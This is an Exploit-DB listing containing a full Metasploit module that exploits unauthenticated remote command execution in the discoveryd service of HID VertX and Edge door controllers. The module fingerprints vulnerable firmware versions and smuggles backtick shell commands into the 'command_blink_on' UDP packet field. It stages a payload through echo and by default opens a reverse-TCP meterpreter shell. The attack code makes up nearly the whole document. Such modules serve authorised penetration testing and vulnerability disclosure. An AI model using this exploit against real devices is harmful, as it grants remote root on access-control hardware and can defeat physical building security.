HID discoveryd - 'command_blink_on' Remote Code Execution (Metasploit)

EDB-ID:

44992

CVE:

N/A




Platform:

Linux

Date:

2018-07-09


##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'HID discoveryd command_blink_on Unauthenticated RCE',
      'Description' => %q{
        This module exploits an unauthenticated remote command execution
        vulnerability in the discoveryd service exposed by HID VertX and Edge
        door controllers.

        This module was tested successfully on a HID Edge model EH400
        with firmware version 2.3.1.603 (Build 04/23/2012).
      },
      'Author'      =>
        [
          'Ricky "HeadlessZeke" Lawshae', # Discovery
          'coldfusion39', # VertXploit
          'Brendan Coles' # Metasploit
        ],
      'License'     => MSF_LICENSE,
      'Platform'    => 'linux',
      'Arch'        => ARCH_ARMLE,
      'Privileged'  => true,
      'References'  =>
        [
          ['ZDI', '16-223'],
          ['URL', 'https://blog.trendmicro.com/let-get-door-remote-root-vulnerability-hid-door-controllers/'],
          ['URL', 'http://nosedookie.blogspot.com/2011/07/identifying-and-querying-hid-vertx.html'],
          ['URL', 'https://exfil.co/2016/05/09/exploring-the-hid-eh400/'],
          ['URL', 'https://github.com/lixmk/Concierge'],
          ['URL', 'https://github.com/coldfusion39/VertXploit']
        ],
      'DisclosureDate'  => 'Mar 28 2016',
      'DefaultOptions'  =>
        {
          'WfsDelay'          => 30,
          'PAYLOAD'           => 'linux/armle/meterpreter/reverse_tcp',
          'CMDSTAGER::FLAVOR' => 'echo'
        },
      'Targets'         => [['Automatic', {}]],
      'CmdStagerFlavor' => 'echo', # wget is available, however the wget command is too long
      'DefaultTarget'   => 0))
    register_options [ Opt::RPORT(4070) ]
  end

  def check
    connect_udp
    udp_sock.put 'discover;013;'
    res = udp_sock.get(5)
    disconnect_udp

    if res.to_s.eql? ''
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    hid_res = parse_discovered_response res
    if hid_res[:mac].eql? ''
      vprint_error 'Malformed response'
      return CheckCode::Safe
    end

    @mac = hid_res[:mac]

    vprint_good "#{rhost}:#{rport} - HID discoveryd service detected"
    vprint_line hid_res.to_s
    report_service(
      host: rhost,
      mac: hid_res[:mac],
      port: rport,
      proto: 'udp',
      name: 'hid-discoveryd',
      info: hid_res
    )

    if hid_res[:version].to_s.eql? ''
      vprint_error "#{rhost}:#{rport} - Could not determine device version"
      return CheckCode::Detected
    end

    # Vulnerable version mappings from VertXploit
    vuln = false
    version = Gem::Version.new(hid_res[:version].to_s)
    case hid_res[:model]
    when 'E400'     # EDGEPlus
      vuln = true if version <= Gem::Version.new('3.5.1.1483')
    when 'EH400'    # EDGE EVO
      vuln = true if version <= Gem::Version.new('3.5.1.1483')
    when 'EHS400'   # EDGE EVO Solo
      vuln = true if version <= Gem::Version.new('3.5.1.1483')
    when 'ES400'    # EDGEPlus Solo
      vuln = true if version <= Gem::Version.new('3.5.1.1483')
    when 'V2-V1000' # VertX EVO
      vuln = true if version <= Gem::Version.new('3.5.1.1483')
    when 'V2-V2000' # VertX EVO
      vuln = true if version <= Gem::Version.new('3.5.1.1483')
    when 'V1000'    # VertX Legacy
      vuln = true if version <= Gem::Version.new('2.2.7.568')
    when 'V2000'    # VertX Legacy
      vuln = true if version <= Gem::Version.new('2.2.7.568')
    else
      vprint_error "#{rhost}:#{rport} - Device model was not recognized"
      return CheckCode::Detected
    end

    vuln ? CheckCode::Appears : CheckCode::Safe
  end

  def send_command(cmd)
    connect_udp

    # double escaping for echo -ne stager
    encoded_cmd = cmd.gsub("\\", "\\\\\\")

    # packet length (max 44)
    len = '044'

    # <num> of times to blink LED, if the device has a LED; else
    # <num> second to beep (very loudly) if the device does not have a LED
    num = -1 # no beep/blink ;)

    # construct packet
    req = ''
    req << 'command_blink_on;'
    req << "#{len};"
    req << "#{@mac};"
    req << "#{num}`#{encoded_cmd}`;"

    # send packet
    udp_sock.put req
    res = udp_sock.get(5)
    disconnect_udp

    unless res.to_s.start_with? 'ack;'
      fail_with Failure::UnexpectedReply, 'Malformed response'
    end
  end

  def execute_command(cmd, opts)
    # the protocol uses ';' as a separator,
    # so we issue each system command separately.
    # we're using the echo command stager which hex encodes the payload,
    # so there's no risk of replacing any ';' characters in the payload data.
    cmd.split(';').each do |c|
      send_command c
    end
  end

  def exploit
    print_status "#{rhost}:#{rport} - Connecting to target"

    check_code = check
    unless check_code == CheckCode::Appears || check_code == CheckCode::Detected
      fail_with Failure::Unknown, "#{rhost}:#{rport} - Target is not vulnerable"
    end

    # linemax is closer to 40,
    # however we need to account for additinal double escaping
    execute_cmdstager linemax: 30, :temp => '/tmp'
  end

  def parse_discovered_response(res)
    info = {}

    return unless res.start_with? 'discovered'

    hid_res = res.split(';')
    return unless hid_res.size == 9
    return unless hid_res[0] == 'discovered'
    return unless hid_res[1].to_i == res.length

    {
      :mac          => hid_res[2],
      :name         => hid_res[3],
      :ip           => hid_res[4],
      # ?           => hid_res[5], # '1'
      :model        => hid_res[6],
      :version      => hid_res[7],
      :version_date => hid_res[8]
    }
  end
end